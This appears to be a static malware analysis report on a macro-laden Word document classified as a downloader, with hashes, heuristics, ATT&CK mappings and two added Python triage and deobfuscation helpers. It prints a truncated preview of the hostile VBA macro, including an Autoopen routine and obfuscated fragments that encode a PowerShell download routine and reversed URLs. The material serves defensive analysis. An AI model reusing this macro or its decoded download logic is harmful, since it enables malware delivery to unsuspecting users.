Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7de95b0c9a6228c1…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 165.0 KB
Created: 2018-05-07 11:56:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: d9e2ca64566dd89a16486e2ed50fc040
SHA-1: 092bfa28d7dd9c188cf595beed05b38b1b74cf75
SHA-256: 7de95b0c9a6228c176f7c839edb68e42b9d10e4dd9d918f4df32b829578d621b
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File (the macro runs only after the recipient opens the document and enables macros; no parser exploit is evidenced by the findings below, so T1203 Exploitation for Client Execution is not supported)

The sample carries a full VBA project (recovered below as macros.bas, 147,389 bytes of decoded source) whose entry point is Sub Autoopen(); Word runs it as soon as the document is opened with macros enabled, so no further user interaction is required. The OLE_VBA_SHELL heuristic reports a Shell() call in that project, meaning the macro is written to launch an external command; the call itself lies past the truncated preview. What the preview does show is heavy padding (junk arithmetic, unused assignments, On Error Resume Next) around a small core: Autoopen() passes the return value of KwtIbvZOY() to another procedure, and KwtIbvZOY() assembles strings through AmFvzi() from fragments that contain //:ptth, i.e. http:// written backwards. That is the usual shape of a macro downloader, and the ClamAV name Doc.Dropper.Agent-6533721-0 classifies it the same way. The legacy WordBasic marker fired on the same AutoOpen name and adds no separate evidence. Nothing in the static results points at a parser vulnerability: execution depends on the user enabling macros.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6533721-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6533721-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note for this sample: a modern VBA project was in fact recovered (macros.bas below, with Sub Autoopen()), so the marker duplicates OLE_VBA_AUTOOPEN rather than indicating a separate WordBasic payload.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into any document containing drawing objects; it is never fetched at run time and is not an indicator of compromise.
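The heuristics above are the output of the analysis platform; to show what such checks actually look at, here is a minimal regex-based equivalent of OLE_VBA_AUTOOPEN, OLE_VBA_SHELL and EMBEDDED_URL run over VBA source text. This is an added example, not the platform's or oletools' own code. On a real sample feed it the macros.bas that `olevba --decode sample.doc` (oletools) produces; VBA_SAMPLE below is a constructed excerpt of the listing on this page, and the treatment of `'+'` as a concatenation seam is an assumption.

```python
"""Re-derive the page's macro heuristics from extracted VBA text (added example)."""
import re

# Procedure names Word/Excel run automatically once macros are enabled.
AUTOEXEC_NAMES = {
    "autoopen", "autoexec", "autoclose", "autoexit", "autonew",
    "document_open", "document_close", "document_new",
    "workbook_open", "workbook_close", "auto_open", "auto_close",
}
PROC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)
SHELL_RE = re.compile(r"\bShell\s*\(", re.I)
SUSPICIOUS_RE = re.compile(
    r"\b(CreateObject|WScript\.Shell|powershell|URLDownloadToFile|Environ)\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)
# "http://" written backwards, as in the string fragments of KwtIbvZOY().
REV_URL_RE = re.compile(r"//:s?ptth", re.I)
# Assumption: "'+'" inside the VBA string literals is a PowerShell-style
# 'a'+'b' concatenation seam; removing it re-joins markers split across seams.
SEAM = "'+'"


def triage_vba(src: str) -> dict:
    """Return the same kind of findings the heuristics table reports."""
    procs = PROC_RE.findall(src)
    joined = src.replace(SEAM, "")
    return {
        "procedures": len(procs),
        "autoexec": [p for p in procs if p.lower() in AUTOEXEC_NAMES],
        "shell_call": bool(SHELL_RE.search(src)),
        "suspicious_calls": sorted({m.lower() for m in SUSPICIOUS_RE.findall(src)}),
        "urls": URL_RE.findall(src),
        # A naive scan of the raw text misses the marker split by seams;
        # scanning the re-joined copy catches it.
        "reversed_url_markers_raw": len(REV_URL_RE.findall(src)),
        "reversed_url_markers_joined": len(REV_URL_RE.findall(joined)),
        "on_error_resume_next": len(re.findall(r"\bOn Error Resume Next\b", src, re.I)),
    }


# Constructed excerpt of the page's macros.bas listing (not the full file).
VBA_SAMPLE = r'''
Attribute VB_Name = "wrQXOmivkYFzp"
Sub Autoopen()
On Error Resume Next
Set TWEcsl = hTuKOi
llntqwANwip (ruNbl + KwtIbvZOY + qziUL)
End Sub
Function KwtIbvZOY()
On Error Resume Next
CozlroMK = AmFvzi("dic9q'+'o'+'c.'+'anicileyu'+'b//:ptth'+'@/'+'sYjn/mo'+'c.'+'on'+'abrula'+'usiv/'+'/'+':pt'+'th@/8lgMSUR", 19072 - 19072 + 3 + 19072 - 19072, 19072 - 19072 + 96 + 19072 - 19072)
End Function
'''

if __name__ == "__main__":
    for key, value in triage_vba(VBA_SAMPLE).items():
        print(f"{key}: {value}")
```

On the excerpt, Autoopen is the only auto-exec entry point, no Shell() or URL is visible (both lie past the truncated preview, which is why the platform's OLE_VBA_SHELL finding cannot be confirmed from the listing alone), and the backwards http:// marker is found once in the raw text but twice once the seams are removed.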

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 147389 bytes
SHA-256: a0bd01c5637c59ffa3282eecd43a6dc82f353b78e65037406561be04081f8159

Preview (first 1,000 lines of the extracted script; the listing below is truncated):
Attribute VB_Name = "wrQXOmivkYFzp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BzkMfC(ciuCEs)
Set wvKoC = jquQUh
zSQkzr = IzEBlr
BAjXln = UHlwR + Atn(SKETrz) + 19493 - 61678 / (19079 * Hex(JCNwM))
rJCKGi = 80726 + tjuld
End Sub
Sub ioiHd(vlKohw)
Set mWUXqu = PcuHd
UpaHDY = wiVUF
OAGzO = JnCrYL + Atn(qFwCt) + 51981 - 57517 / (80142 * Hex(GKCkIu))
EBzRXj = 43890 + dfiUA
Set zBwAi = Bjbtcd
uvwiTP = wqYtfJ
mZNwJp = IJGja + Atn(rXaGpu) + 91870 - 53976 / (27231 * Hex(BKFHSH))
CUYNPG = 25745 + SoZmmp
Set tRBaQS = lOGYs
mEisB = EPBkcR
JXGWp = rHQnFr + Atn(KwjKGr) + 27278 - 2509 / (20202 * Hex(GjlFl))
rhZJDJ = 62837 + rRwBEV
End Sub
Sub cAKWG(rdlCLw)
Set zpEWG = ZFfinA
ETpuM = owdfbj
wAEoGr = XfBMZ + Atn(bwLwSW) + 41344 - 78425 / (53597 * Hex(oqqOJ))
WKdmb = 58584 + Brbvq
Set YRcURW = kjNENq
cQzQd = JIrjn
wXKFr = fuCGLV + Atn(sQcpz) + 47645 - 48119 / (71519 * Hex(wltKS))
kQathz = 48869 + abWii
End Sub
Sub Autoopen()
On Error Resume Next
Set TWEcsl = hTuKOi
bYMjIq = mfRoa
vBObu = pnajRS + Atn(ECwjjT) + 28658 - 70087 / (88954 * Hex(OpWrl))
qnoRSo = 62439 + TPXtB
llntqwANwip (ruNbl + KwtIbvZOY + qziUL)
Set BzzlYw = GjtdB
QWsMT = VjtKUc
GiqqFT = jnhEh + Atn(YpuRwR) + 23368 - 23435 / (41160 * Hex(zmOYqz))
ofJds = 48563 + toJwf
End Sub
Sub onfcXj(bLCQik)
Set tDqvPk = sZYNjQ
XKIQjs = JHlAKK
cdtuHf = pzNhu + Atn(wOGOqP) + 20881 - 7321 / (3354 * Hex(zBswjv))
uEawP = 91396 + TZkHhM
Set jmuAuB = Juzcb
tsPjnu = ScUwjT
vRfDVp = QPzwou + Atn(kKaWoL) + 73621 - 50185 / (19163 * Hex(UnUbG))
vTbab = 84765 + vGmlc
Set RmwAKi = tcsHo
HdjiU = KwBdM
GsuiP = aJwsP + Atn(nKtoX) + 36967 - 52113 / (38418 * Hex(FklMYR))
SiPIl = 63413 + pXONq
End Sub
Sub iYPOOv(cVbiC)
Set hBIJSr = LrScGj
GERIG = mHhUWw
HlzDjG = zChNwW + Atn(VnGmI) + 59168 - 78973 / (6630 * Hex(DScRG))
TnnUNd = 49241 + OvzqGE
End Sub

Attribute VB_Name = "DMkfQUaiOT"
Sub DNtkEp(ZitabI)
Set wsrqIo = wBAGsl
GtFYBZ = MBdrK
hWddk = DUbjsF + Atn(FEMtiM) + 6324 - 93791 / (37193 * Hex(oBaiCk))
NwwkBc = 44923 + WQiVi
End Sub
Function KwtIbvZOY()
On Error Resume Next
Set NTVTV = IzfHH
jpbJt = kjVtH
EcoWHv = bofai + Atn(OhjjO) + 37841 - 82387 / (55261 * Hex(vhvNWj))
uoUMaP = 86159 + mrjmf
Set KzZzHb = DuTIuI
bjrnS = lAXkVa
IDQuKu = TzIjKw + Atn(PkfWL) + 47122 - 22760 / (79779 * Hex(LSqBu))
cpihr = 36111 + iYwAjp
PBudPTUtD = AmFvzi("aYDa5t'+'SoTS7j.cfsaMT'+'2(S7jelWvRIFdaOWvRlnWW'+'vRoD'+'S7j.UYYMT8kK", 46069 - 46069 + 4 + 46069 - 46069, 46069 - 46069 + 61 + 46069 - 46069)
Set aHcUiV = rNJBX
uFcUt = JXTFdG
QFHYLr = NiDpW + Atn(YskbV) + 60747 - 38063 / (33 * Hex(ZviHz))
FHBzNv = 10752 + kpwJC
Set AapKk = hNZDZq
DFzHYL = bCffKE
GQbVYi = RlHaO + Atn(IrPfN) + 27848 - 70476 / (46487 * Hex(uLkpW))
wuKAjM = 52251 + ziBIFm
RwjNCZQk = AmFvzi("ck3FN+3FNen3FN('+'. = UYYMT2;'+'modna'+'r )3FNt3'+'F8@tn1", 10343 - 10343 + 6 + 10343 - 10343, 10343 - 10343 + 50 + 10343 - 10343)
Set qjJCi = mASwTC
WQkiLb = qzaiz
vSzLGi = vEibno + Atn(LurDM) + 20175 - 69918 / (50703 * Hex(zTwiTd))
GbFBoT = 5198 + qoQvR
Set DKpUjj = LBfiNn
vcTZI = zHoqz
ErskZO = EoFPzd + Atn(wvKMh) + 9028 - 92769 / (25250 * Hex(IDOmq))
wVwXjf = 9044 + RGPSj
ptnaSrWTw = AmFvzi("m0W3'+'FN@3FN(tilpS'+'.3FN'+'/dtVVs/m0,bv", 73781 - 73781 + 5 + 73781 - 73781, 73781 - 73781 + 34 + 73781 - 73781)
Set pNTwvc = wcJsA
fjjKcE = rkQct
sbtGRm = dVukS + Atn(Nhztpf) + 67277 - 78478 / (47958 * Hex(lvmNOr))
zqDNk = 49820 + VrGnM
Set bzWJL = BMlrE
WCnat = vEtsW
DNkcDi = TnpQCG + Atn(CFuHsj) + 20320 - 30186 / (65476 * Hex(fjksai))
jctGz = 78714 + JCKlN
CozlroMK = AmFvzi("dic9q'+'o'+'c.'+'anicileyu'+'b//:ptth'+'@/'+'sYjn/mo'+'c.'+'on'+'abrula'+'usiv/'+'/'+':pt'+'th@/8lgMSUR", 19072 - 19072 + 3 + 19072 - 19072, 19072 - 19072 + 96 + 19072 - 19072)
Set mkUuGq = mAqSn
qzWwot = ihZMs
QVzpV = BBHvM + Atn(lkYYim) + 53062 - 35703 / (35021 * Hex(bmEVsI))
FKICB = 48282
... (truncated)
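The body of AmFvzi() lies past the truncation point, so how it turns these fragments into a command is unknown. The fragments themselves give three hints: `'+'` seams, the reversed marker //:ptth, and short substrings (S7j, WvR, 3FN) repeated more often than natural text would. The helper below, an added example rather than code from the sample or the analysis platform, tests the hypothesis "strip the seams, reverse, drop inserted junk tokens" against the four AmFvzi() arguments copied from the listing, and folds the padded numeric arguments (46069 - 46069 + 4 + 46069 - 46069 and the like) to their constants. Everything it recovers is a hypothesis until the routine is confirmed dynamically; any hostnames that fall out are leads, not confirmed indicators.

```python
"""Hypothesis test for the string builder called from KwtIbvZOY() (added example)."""
import ast
from collections import Counter

# The four AmFvzi(...) string arguments, copied verbatim from the listing.
FRAGMENTS = {
    "call1": "aYDa5t'+'SoTS7j.cfsaMT'+'2(S7jelWvRIFdaOWvRlnWW'+'vRoD'+'S7j.UYYMT8kK",
    "call2": "ck3FN+3FNen3FN('+'. = UYYMT2;'+'modna'+'r )3FNt3'+'F8@tn1",
    "call3": "m0W3'+'FN@3FN(tilpS'+'.3FN'+'/dtVVs/m0,bv",
    "call4": "dic9q'+'o'+'c.'+'anicileyu'+'b//:ptth'+'@/'+'sYjn/mo'+'c.'+'on'+'abrula'+'usiv/'+'/'+':pt'+'th@/8lgMSUR",
}
# Assumption: "'+'" is a PowerShell-style 'a'+'b' concatenation seam.
SEAM = "'+'"


def fold_constant(expr: str) -> int:
    """Evaluate the sample's padded integer arguments (only + and - allowed,
    no eval()), e.g. '46069 - 46069 + 4 + 46069 - 46069' -> 4."""
    tree = ast.parse(expr, mode="eval")

    def ev(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Sub)):
            left, right = ev(node.left), ev(node.right)
            return left + right if isinstance(node.op, ast.Add) else left - right
        raise ValueError(f"unsupported node: {ast.dump(node)}")

    return ev(tree.body)


def candidate_junk(s: str, n: int = 3, min_count: int = 3) -> set:
    """n-grams repeated at least min_count times are junk-insertion
    candidates; natural text rarely repeats an arbitrary trigram that often."""
    grams = Counter(s[i:i + n] for i in range(len(s) - n + 1))
    return {g for g, c in grams.items() if c >= min_count}


def decode(fragment: str, junk=None) -> str:
    """Hypothesis: join seams, reverse, then delete the junk tokens (which
    were inserted before reversal, so they are deleted reversed)."""
    joined = fragment.replace(SEAM, "")
    if junk is None:
        junk = candidate_junk(joined)
    out = joined[::-1]
    for tok in junk:
        out = out.replace(tok[::-1], "")
    return out


def indicators(decoded: str) -> dict:
    """Cheap signals an analyst looks for in the recovered text."""
    low = decoded.lower()
    return {
        "urls": low.count("http://"),
        "downloadfile": "downloadfile(" in low,
        "split": ".split(" in low,
        "at_separated": "@" in decoded and "http://" in low,
    }


def report() -> dict:
    """Decode every fragment and summarise what the hypothesis recovers."""
    return {name: (decode(frag), indicators(decode(frag))) for name, frag in FRAGMENTS.items()}


if __name__ == "__main__":
    print("arg 2 of call1 folds to", fold_constant("46069 - 46069 + 4 + 46069 - 46069"))
    for name, (decoded, ind) in report().items():
        print(name, ind, repr(decoded))
```

Under this hypothesis call1 yields a case-mangled DownloadFile( call, call3 a .Split( call, and call4 two http:// URLs separated by @, which is the familiar shape of a PowerShell downloader iterating over an @-split URL list. Leading and trailing characters that the guess does not explain (for example the 2 before the second token in call1) are left in place rather than trimmed, because the folded numeric arguments may encode exactly those offsets; confirm by running the document in a sandbox with macro tracing before treating any recovered host as an indicator.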